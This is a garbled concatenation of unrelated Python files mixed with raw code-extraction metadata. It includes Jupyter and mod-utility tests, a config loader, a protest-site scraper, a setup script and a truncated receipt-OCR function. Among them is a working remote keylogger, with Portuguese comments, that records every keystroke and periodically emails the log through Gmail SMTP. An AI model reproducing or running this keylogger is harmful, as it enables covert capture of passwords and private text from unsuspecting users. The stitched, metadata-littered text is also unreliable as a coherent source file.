'(users_factories.TeacherFactory)\n', (4937, 4969), False, 'import factory\n'), ((5036, 5062), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (5051, 5062), True, 'import factory.fuzzy as fuzzy\n'), ((5077, 5098), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (5090, 5098), False, 'import factory\n'), ((5223, 5249), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (5238, 5249), True, 'import factory.fuzzy as fuzzy\n'), ((5268, 5289), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (5281, 5289), False, 'import factory\n'), ((3748, 3769), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3767, 3769), False, 'import datetime\n'), ((4151, 4172), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (4170, 4172), False, 'import datetime\n'), ((4721, 4742), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (4740, 4742), False, 'import datetime\n'), ((5001, 5022), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5020, 5022), False, 'import datetime\n'), ((5531, 5552), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5550, 5552), False, 'import datetime\n'), ((5587, 5608), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5606, 5608), False, 'import datetime\n'), ((1018, 1052), 'users.models.Student.objects.all', 'users_models.Student.objects.all', ([], {}), '()\n', (1050, 1052), True, 'from users import models as users_models\n'), ((2030, 2064), 'users.models.Teacher.objects.all', 'users_models.Teacher.objects.all', ([], {}), '()\n', (2062, 2064), True, 'from users import models as users_models\n'), ((2437, 2458), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (2456, 2458), False, 'import datetime\n'), ((2461, 2489), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (2479, 2489), False, 'import datetime\n'), ((2508, 2529), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (2527, 2529), False, 'import datetime\n'), ((2532, 2560), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (2550, 2560), False, 'import datetime\n'), ((3265, 3286), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3284, 3286), False, 'import datetime\n'), ((3289, 3317), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (3307, 3317), False, 'import datetime\n'), ((3336, 3357), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3355, 3357), False, 'import datetime\n'), ((3360, 3388), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (3378, 3388), False, 'import datetime\n'), ((5367, 5394), 'factory.django.ImageField', 'factory.django.ImageField', ([], {}), '()\n', (5392, 5394), False, 'import factory\n')] |
from redisbus.utility import DictObj
def test_dictobj():
subject_dict = {
"foo": "bar",
"left": "right"
}
subject_obj = DictObj(subject_dict)
assert hasattr(subject_obj, 'foo')
assert hasattr(subject_obj, 'left')
assert subject_obj.foo == "bar"
assert subject_obj.left == "right"
| [
"redisbus.utility.DictObj"
] | [((151, 172), 'redisbus.utility.DictObj', 'DictObj', (['subject_dict'], {}), '(subject_dict)\n', (158, 172), False, 'from redisbus.utility import DictObj\n')] |
# Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import json
import pytest
from testfixtures import mock
from kale.utils import jupyter_utils as ju
def _output_display(data):
# `data` must be a list
return [{'output_type': 'display_data', 'data': data}]
@pytest.mark.parametrize("outputs,target", [
([], ""),
# ---
(_output_display({'image/png': "bytes"}),
ju.image_html_template.format("", "bytes")),
# ---
(_output_display({'text/html': "bytes"}), "bytes"),
# ---
(_output_display({'text/plain': "bytes"}),
ju.text_html_template.format("bytes")),
# ---
(_output_display({'application/javascript': "bytes"}),
ju.javascript_html_template.format("bytes")),
])
def test_generate_html_output(outputs, target):
"""Tests html artifact generation from cell outputs."""
assert target == ju.generate_html_output(outputs)
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_not_exists(pod_utils, tmpdir):
"""Test the uimetadata file is created when it does not exists."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
base = {"outputs": []}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_not_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
markdown = {
'type': 'markdown',
'storage': 'inline',
'source': '#Some markdown'
}
base = {"outputs": [markdown]}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [markdown, {
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)
def test_run_code():
"""Test that Python code runs inside a jupyter kernel successfully."""
# test standard code
code = ("a = 3\nprint(a)", )
ju.run_code(code)
# test magic command
code = ("%%time\nprint('Some dull code')", )
ju.run_code(code)
| [
"kale.utils.jupyter_utils.generate_html_output",
"kale.utils.jupyter_utils.javascript_html_template.format",
"testfixtures.mock.patch",
"kale.utils.jupyter_utils.image_html_template.format",
"kale.utils.jupyter_utils.run_code",
"os.path.join",
"kale.utils.jupyter_utils.update_uimetadata",
"kale.utils.jupyter_utils.text_html_template.format"
] | [((1441, 1489), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.pod_utils"""'], {}), "('kale.utils.jupyter_utils.pod_utils')\n", (1451, 1489), False, 'from testfixtures import mock\n'), ((2215, 2263), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.pod_utils"""'], {}), "('kale.utils.jupyter_utils.pod_utils')\n", (2225, 2263), False, 'from testfixtures import mock\n'), ((3083, 3131), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.pod_utils"""'], {}), "('kale.utils.jupyter_utils.pod_utils')\n", (3093, 3131), False, 'from testfixtures import mock\n'), ((4088, 4159), 'testfixtures.mock.patch', 'mock.patch', (['"""kale.utils.jupyter_utils.process_outputs"""'], {'new': '(lambda x: x)'}), "('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)\n", (4098, 4159), False, 'from testfixtures import mock\n'), ((1798, 1841), 'os.path.join', 'os.path.join', (['tmpdir', '"""tmp_uimetadata.json"""'], {}), "(tmpdir, 'tmp_uimetadata.json')\n", (1810, 1841), False, 'import os\n'), ((1869, 1923), 'kale.utils.jupyter_utils.update_uimetadata', 'ju.update_uimetadata', (['"""test"""'], {'uimetadata_path': 'filepath'}), "('test', uimetadata_path=filepath)\n", (1889, 1923), True, 'from kale.utils import jupyter_utils as ju\n'), ((2625, 2668), 'os.path.join', 'os.path.join', (['tmpdir', '"""tmp_uimetadata.json"""'], {}), "(tmpdir, 'tmp_uimetadata.json')\n", (2637, 2668), False, 'import os\n'), ((2737, 2791), 'kale.utils.jupyter_utils.update_uimetadata', 'ju.update_uimetadata', (['"""test"""'], {'uimetadata_path': 'filepath'}), "('test', uimetadata_path=filepath)\n", (2757, 2791), True, 'from kale.utils import jupyter_utils as ju\n'), ((3620, 3663), 'os.path.join', 'os.path.join', (['tmpdir', '"""tmp_uimetadata.json"""'], {}), "(tmpdir, 'tmp_uimetadata.json')\n", (3632, 3663), False, 'import os\n'), ((3732, 3786), 'kale.utils.jupyter_utils.update_uimetadata', 'ju.update_uimetadata', (['"""test"""'], {'uimetadata_path': 'filepath'}), "('test', uimetadata_path=filepath)\n", (3752, 3786), True, 'from kale.utils import jupyter_utils as ju\n'), ((4318, 4335), 'kale.utils.jupyter_utils.run_code', 'ju.run_code', (['code'], {}), '(code)\n', (4329, 4335), True, 'from kale.utils import jupyter_utils as ju\n'), ((4415, 4432), 'kale.utils.jupyter_utils.run_code', 'ju.run_code', (['code'], {}), '(code)\n', (4426, 4432), True, 'from kale.utils import jupyter_utils as ju\n'), ((1405, 1437), 'kale.utils.jupyter_utils.generate_html_output', 'ju.generate_html_output', (['outputs'], {}), '(outputs)\n', (1428, 1437), True, 'from kale.utils import jupyter_utils as ju\n'), ((940, 982), 'kale.utils.jupyter_utils.image_html_template.format', 'ju.image_html_template.format', (['""""""', '"""bytes"""'], {}), "('', 'bytes')\n", (969, 982), True, 'from kale.utils import jupyter_utils as ju\n'), ((1113, 1150), 'kale.utils.jupyter_utils.text_html_template.format', 'ju.text_html_template.format', (['"""bytes"""'], {}), "('bytes')\n", (1141, 1150), True, 'from kale.utils import jupyter_utils as ju\n'), ((1227, 1270), 'kale.utils.jupyter_utils.javascript_html_template.format', 'ju.javascript_html_template.format', (['"""bytes"""'], {}), "('bytes')\n", (1261, 1270), True, 'from kale.utils import jupyter_utils as ju\n')] |
import yaml
from pkg_resources import resource_stream
def load(filename):
with resource_stream(__name__, filename) as config_file:
return yaml.load(config_file)
def load_cluster_config(name):
return load('{0}.yml'.format(name))
_env = load('context.yml')
_configs = {}
def get_config(env):
if env not in _configs:
_configs[env] = load_cluster_config(get_cluster_name(env))
_configs[env].update(_env[env].get("override", {}))
return _configs[env]
def get_cluster_name(env):
return _env[env]["cluster"]
| [
"pkg_resources.resource_stream",
"yaml.load"
] | [((86, 121), 'pkg_resources.resource_stream', 'resource_stream', (['__name__', 'filename'], {}), '(__name__, filename)\n', (101, 121), False, 'from pkg_resources import resource_stream\n'), ((153, 175), 'yaml.load', 'yaml.load', (['config_file'], {}), '(config_file)\n', (162, 175), False, 'import yaml\n')] |
import importlib
import sys
import pytest
from firewood import models
gan = ["gan." + model for model in models.gan.__all__]
semantic_segmentation = [
"semantic_segmentation." + model
for model in models.semantic_segmentation.__all__
]
all_models = gan + semantic_segmentation
@pytest.mark.parametrize("model", all_models)
def test_models(model: str) -> None:
module = importlib.import_module("firewood.models." + model)
sys.argv = [""]
module.main()
| [
"pytest.mark.parametrize",
"importlib.import_module"
] | [((292, 336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""model"""', 'all_models'], {}), "('model', all_models)\n", (315, 336), False, 'import pytest\n'), ((387, 438), 'importlib.import_module', 'importlib.import_module', (["('firewood.models.' + model)"], {}), "('firewood.models.' + model)\n", (410, 438), False, 'import importlib\n')] |
# keylogger_remoto_py
#Um Keylogger Remoto em Python
import keyboard # para keylogs
import smtplib # para enviar email usando o protocolo SMTP (gmail)
# O semáforo é para bloquear o segmento atual
# O temporizador é para executar um método após uma quantidade de tempo "intervalo"
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 120 # 02 minutes
EMAIL_ADDRESS = "<seu_endereço_de_email>"
EMAIL_PASSWORD = "<<PASSWORD>>"
class Keylogger:
def __init__(self, interval):
# passaremos SEND_REPORT_EVERY para o intervalo
self.interval = interval
# esta é a variável de string que contém o log de todos
# as teclas dentro de "self.interval"
self.log = ""
# para bloquear após definir o ouvinte on_release
self.semaphore = Semaphore(0)
def callback(self, event):
"""
Esse retorno de chamada é chamado sempre que um evento de teclado ocorre
(ou seja, quando uma chave é liberada neste exemplo)
"""
name = event.name
if len(name) > 1:
# não é um caractere, tecla especial (por exemplo, ctrl, alt etc.)
# maiúsculas com []
if name == "space":
# " "em vez de "espaço"
name = " "
elif name == "enter":
# adicione uma nova linha sempre que um ENTER for pressionado
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
# substituir espaços por sublinhados
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log += name
def sendmail(self, email, password, message):
# gerencia uma conexão com um servidor SMTP
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# conectar-se ao servidor SMTP como modo TLS (por segurança)
server.starttls()
# faça login na conta de email
server.login(email, password)
# envie a mensagem real
server.sendmail(email, email, message)
# finaliza a sessão
server.quit()
def report(self):
"""
Esta função é chamada todo "self.interval"
Ele basicamente envia keylogs e redefine a variável "self.log"
"""
if self.log:
# se houver algo no log, relate-o
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
# pode imprimir em um arquivo, o que você quiser
# imprimir(self.log)
self.log = ""
Timer(interval=self.interval, function=self.report).start()
def start(self):
# inicie o keylogger
keyboard.on_release(callback=self.callback)
# comece a relatar os keylogs
self.report()
# bloquear o segmento atual
# desde on_release () não bloqueia o segmento atual
# se não o bloquearmos, quando executarmos o programa, nada acontecerá
# isso ocorre porque on_release () iniciará o ouvinte em um thread separado
self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
#by Herik_Carvalho
| [
"threading.Timer",
"threading.Semaphore",
"keyboard.on_release",
"smtplib.SMTP"
] | [((789, 801), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (798, 801), False, 'from threading import Semaphore, Timer\n'), ((1783, 1828), 'smtplib.SMTP', 'smtplib.SMTP', ([], {'host': '"""smtp.gmail.com"""', 'port': '(587)'}), "(host='smtp.gmail.com', port=587)\n", (1795, 1828), False, 'import smtplib\n'), ((2677, 2720), 'keyboard.on_release', 'keyboard.on_release', ([], {'callback': 'self.callback'}), '(callback=self.callback)\n', (2696, 2720), False, 'import keyboard\n'), ((2558, 2609), 'threading.Timer', 'Timer', ([], {'interval': 'self.interval', 'function': 'self.report'}), '(interval=self.interval, function=self.report)\n', (2563, 2609), False, 'from threading import Semaphore, Timer\n')] |
import json
import os
# make it easy to change this for testing
XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/')
def default_search_folders(app_name):
'''
Return the list of folders to search for configuration files
'''
return [
'%s/cdis/%s' % (XDG_DATA_HOME, app_name),
'/usr/share/cdis/%s' % app_name,
'/var/www/%s' % app_name
]
def find_paths(file_name,app_name,search_folders=None):
'''
Search the given folders for file_name
search_folders defaults to default_search_folders if not specified
return the first path to file_name found
'''
search_folders = search_folders or default_search_folders(app_name)
possible_files = [ os.path.join(folder, file_name) for folder in search_folders ]
return [ path for path in possible_files if os.path.exists(path) ]
def load_json(file_name,app_name,search_folders=None):
'''
json.load(file_name) after finding file_name in search_folders
return the loaded json data or None if file not found
'''
actual_files = find_paths(file_name, app_name, search_folders)
if not actual_files:
return None
with open(actual_files[0], 'r') as reader:
return json.load(reader)
| [
"json.load",
"os.path.join",
"os.getenv",
"os.path.exists"
] | [((79, 120), 'os.getenv', 'os.getenv', (['"""XDG_DATA_HOME"""', '"""/usr/share/"""'], {}), "('XDG_DATA_HOME', '/usr/share/')\n", (88, 120), False, 'import os\n'), ((675, 706), 'os.path.join', 'os.path.join', (['folder', 'file_name'], {}), '(folder, file_name)\n', (687, 706), False, 'import os\n'), ((1157, 1174), 'json.load', 'json.load', (['reader'], {}), '(reader)\n', (1166, 1174), False, 'import json\n'), ((784, 804), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (798, 804), False, 'import os\n')] |
#Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s
#How to open python in command prompt:
#1) Shift+Right Click -> open command prompt
#2) type "conda activate"
#3) type "python"
#To run the python script, type the following line into the command prompt:
#python "C:\Users\travi\Dropbox\Police Killings\Do Files\webscrape.py"
# import packages
import time
import itertools
import csv
import codecs
from bs4 import BeautifulSoup
from selenium import webdriver
from time import sleep
# access website through automated chrome
chrome_path=r"C:\Users\travi\Anaconda3\Lib\site-packages\selenium\chromedriver.exe"
driver = webdriver.Chrome(chrome_path)
driver.get('https://elephrame.com/textbook/BLM')
sleep(2)
# save csv
filename = "../Data/BLM Protests/protests_scrape.csv"
f = codecs.open(filename, encoding='utf-8', mode='w+')
headers = "Location, Date, Subject, Description, Participants\n"
f.write(headers)
# loop clicks over all pages
page_new = 1
pagenum = -1
while(pagenum < page_new):
#click to next page
if pagenum > -1:
driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[4]""").click()
# don't overflow website
sleep(2)
#update page numbers for while statement
page_new = driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[3]/input""").get_attribute("value")
page_new = int(page_new, 10) #coverts from string to numeric
pagenum = pagenum + 1
# append data from this click
locations = driver.find_elements_by_class_name("item-protest-location")
dates = driver.find_elements_by_class_name("protest-start")
participants = driver.find_elements_by_class_name("item-protest-participants")
descriptions = driver.find_elements_by_class_name("item-protest-description")
subjects = driver.find_elements_by_class_name("item-protest-subject")
for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants):
print(a.text, b.text, c.text, d.text, e.text)
f.write(a.text.replace(",", "|") + "," + b.text.replace(",", "|") + "," + c.text.replace(",", "|").replace("Subject(s): ","") + "," + d.text.replace(",", "|").replace("Description: ","") + "," + e.text + "\n")
# close browser
driver.quit()
# close csv file
f.close() | [
"codecs.open",
"selenium.webdriver.Chrome",
"time.sleep"
] | [((666, 695), 'selenium.webdriver.Chrome', 'webdriver.Chrome', (['chrome_path'], {}), '(chrome_path)\n', (682, 695), False, 'from selenium import webdriver\n'), ((747, 755), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (752, 755), False, 'from time import sleep\n'), ((830, 880), 'codecs.open', 'codecs.open', (['filename'], {'encoding': '"""utf-8"""', 'mode': '"""w+"""'}), "(filename, encoding='utf-8', mode='w+')\n", (841, 880), False, 'import codecs\n'), ((1217, 1225), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1222, 1225), False, 'from time import sleep\n')] |
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils
from sims4communitylib.testing.common_test_service import CommonTestService
from sims4communitylib.utils.common_function_utils import CommonFunctionUtils
# noinspection PyMissingOrEmptyDocstring
@CommonTestService.test_class(ModInfo.get_identity())
class CommonFunctionUtilsTests:
@staticmethod
@CommonTestService.test(True, True, True, True)
@CommonTestService.test(True, False, True, False)
@CommonTestService.test(True, False, False, True)
@CommonTestService.test(False, False, False, False)
def run_predicates_as_one_should_work_properly(func_result_one: bool, func_result_two: bool, all_must_pass: bool, expected_result: bool):
def _function_one(*_, **__) -> Any:
return func_result_one
def _function_two(*_, **__) -> Any:
return func_result_two
result = CommonFunctionUtils.run_predicates_as_one((_function_one, _function_two), all_must_pass=all_must_pass)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test(True, False)
@CommonTestService.test(False, True)
def run_predicate_with_reversed_result_should_work_properly(func_result: bool, expected_result: bool):
def _function(*_, **__) -> Any:
return func_result
result = CommonFunctionUtils.run_predicate_with_reversed_result(_function)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test()
def run_with_arguments_should_work_properly() -> None:
_additional_value = 'No'
_additional_key_word_value = 'What'
normal_val = 'one'
normal_key_val = 'two'
def _function(normal_arg: str, value_one: str, normal_key_arg: str=None, key_value: str=None) -> Any:
CommonAssertionUtils.are_equal(value_one, _additional_value)
CommonAssertionUtils.are_equal(key_value, _additional_key_word_value)
CommonAssertionUtils.are_equal(normal_arg, normal_val)
CommonAssertionUtils.are_equal(normal_key_arg, normal_key_val)
if normal_arg == normal_val and normal_key_arg == normal_key_val and value_one == _additional_value and key_value == _additional_key_word_value:
return True
result = CommonFunctionUtils.run_with_arguments(_function, _additional_value, key_value=_additional_key_word_value)(normal_val, normal_key_arg=normal_key_val)
CommonAssertionUtils.is_true(result, message='Failed to send proper arguments: {}'.format(result))
| [
"sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicate_with_reversed_result",
"sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_with_arguments",
"sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal",
"sims4communitylib.modinfo.ModInfo.get_identity",
"sims4communitylib.testing.common_test_service.CommonTestService.test",
"sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicates_as_one"
] | [((719, 765), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(True)', '(True)', '(True)'], {}), '(True, True, True, True)\n', (741, 765), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((771, 819), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(False)', '(True)', '(False)'], {}), '(True, False, True, False)\n', (793, 819), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((825, 873), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(False)', '(False)', '(True)'], {}), '(True, False, False, True)\n', (847, 873), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((879, 929), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(False)', '(False)', '(False)', '(False)'], {}), '(False, False, False, False)\n', (901, 929), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((1442, 1477), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(True)', '(False)'], {}), '(True, False)\n', (1464, 1477), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((1483, 1518), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', (['(False)', '(True)'], {}), '(False, True)\n', (1505, 1518), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((1871, 1895), 'sims4communitylib.testing.common_test_service.CommonTestService.test', 'CommonTestService.test', ([], {}), '()\n', (1893, 1895), False, 'from sims4communitylib.testing.common_test_service import CommonTestService\n'), ((640, 662), 'sims4communitylib.modinfo.ModInfo.get_identity', 'ModInfo.get_identity', ([], {}), '()\n', (660, 662), False, 'from sims4communitylib.modinfo import ModInfo\n'), ((1362, 1417), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['result', 'expected_result'], {}), '(result, expected_result)\n', (1392, 1417), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((1791, 1846), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['result', 'expected_result'], {}), '(result, expected_result)\n', (1821, 1846), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((1249, 1355), 'sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicates_as_one', 'CommonFunctionUtils.run_predicates_as_one', (['(_function_one, _function_two)'], {'all_must_pass': 'all_must_pass'}), '((_function_one, _function_two),\n all_must_pass=all_must_pass)\n', (1290, 1355), False, 'from sims4communitylib.utils.common_function_utils import CommonFunctionUtils\n'), ((1715, 1780), 'sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_predicate_with_reversed_result', 'CommonFunctionUtils.run_predicate_with_reversed_result', (['_function'], {}), '(_function)\n', (1769, 1780), False, 'from sims4communitylib.utils.common_function_utils import CommonFunctionUtils\n'), ((2213, 2273), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['value_one', '_additional_value'], {}), '(value_one, _additional_value)\n', (2243, 2273), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2286, 2355), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['key_value', '_additional_key_word_value'], {}), '(key_value, _additional_key_word_value)\n', (2316, 2355), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2368, 2422), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['normal_arg', 'normal_val'], {}), '(normal_arg, normal_val)\n', (2398, 2422), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2435, 2497), 'sims4communitylib.testing.common_assertion_utils.CommonAssertionUtils.are_equal', 'CommonAssertionUtils.are_equal', (['normal_key_arg', 'normal_key_val'], {}), '(normal_key_arg, normal_key_val)\n', (2465, 2497), False, 'from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils\n'), ((2701, 2811), 'sims4communitylib.utils.common_function_utils.CommonFunctionUtils.run_with_arguments', 'CommonFunctionUtils.run_with_arguments', (['_function', '_additional_value'], {'key_value': '_additional_key_word_value'}), '(_function, _additional_value,\n key_value=_additional_key_word_value)\n', (2739, 2811), False, 'from sims4communitylib.utils.common_function_utils import CommonFunctionUtils\n')] |
__all__ = ['SockFilterError']
import collections
class SockFilterError(Exception):
Tuple = collections.namedtuple('SockFilterError', ['address'])
def __init__(self, address):
self.address = address
def __repr__(self):
return repr(self._tuple)
def __str__(self):
return str(self._tuple)
def __unicode__(self):
return unicode(self._tuple)
def __eq__(self, other):
if not hasattr(other, '_tuple'):
return False
return self._tuple == other._tuple
def __ne__(self, other):
if not hasattr(other, '_tuple'):
return False
return self._tuple != other._tuple
@property
def _tuple(self):
return self.Tuple(address=self.address)
| [
"collections.namedtuple"
] | [((99, 153), 'collections.namedtuple', 'collections.namedtuple', (['"""SockFilterError"""', "['address']"], {}), "('SockFilterError', ['address'])\n", (121, 153), False, 'import collections\n')] |
import re
from pathlib import Path
from setuptools import setup
install_requires = ["croniter>=1.0.1"]
def read(*parts):
return Path(__file__).resolve().parent.joinpath(*parts).read_text().strip()
def read_version():
regexp = re.compile(r"^__version__\W*=\W*\"([\d.abrc]+)\"")
for line in read("aio_background", "__init__.py").splitlines():
match = regexp.match(line)
if match is not None:
return match.group(1)
else:
raise RuntimeError("Cannot find version in aio_background/__init__.py")
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="aio-background",
version=read_version(),
description="A thing to run tasks in the background",
long_description=long_description,
long_description_content_type="text/markdown",
platforms=["macOS", "POSIX", "Windows"],
author="<NAME>",
python_requires=">=3.9",
project_urls={},
author_email="<EMAIL>",
license="MIT",
packages=["aio_background"],
package_dir={"aio_background": "./aio_background"},
package_data={"aio_background": ["py.typed"]},
install_requires=install_requires,
include_package_data=True,
)
| [
"pathlib.Path",
"re.compile"
] | [((240, 294), 're.compile', 're.compile', (['"""^__version__\\\\W*=\\\\W*\\\\"([\\\\d.abrc]+)\\\\\\""""'], {}), '(\'^__version__\\\\W*=\\\\W*\\\\"([\\\\d.abrc]+)\\\\"\')\n', (250, 294), False, 'import re\n'), ((136, 150), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (140, 150), False, 'from pathlib import Path\n')] |
from google.cloud import vision
import io
import re
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "swagger_server/firebase_key.json"
client = vision.ImageAnnotatorClient()
def process_image(image_file):
total = -1
with io.open(image_file, 'rb') as image_file:
content = image_file.read()
image = vision.types.Image(content=content)
# response = client.document_text_detection(image=image)
response = client.text_detection(image=image)
document = response.text_annotations[1:]
items = []
lines = {}
tally = {}
tally2 = {}
first_line = document[0].description
for text in document:
top_x_axis = text.bounding_poly.vertices[0].x
top_y_axis = text.bounding_poly.vertices[0].y
bottom_y_axis = text.bounding_poly.vertices[3].y
if top_y_axis not in lines:
lines[top_y_axis] = [(top_y_axis, bottom_y_axis), []]
for s_top_y_axis, s_item in lines.items():
if top_y_axis < s_item[0][1]:
lines[s_top_y_axis][1].append((top_x_axis, text.description))
break
for _, item in lines.items():
if item[1]:
words = sorted(item[1], key=lambda t: t[0])
items.append(
(item[0], ' '.join([word for _, word in words]), words))
for i in range(len(items)):
items[i] = items[i][1]
orders = []
pattern = re.compile(
"(([0-9]?[x]?[ ]?)([0-9a-zA-Z.']+[ ])+[$£€]?[0-9]+\.[0-9][0-9])")
total_regex = re.compile(
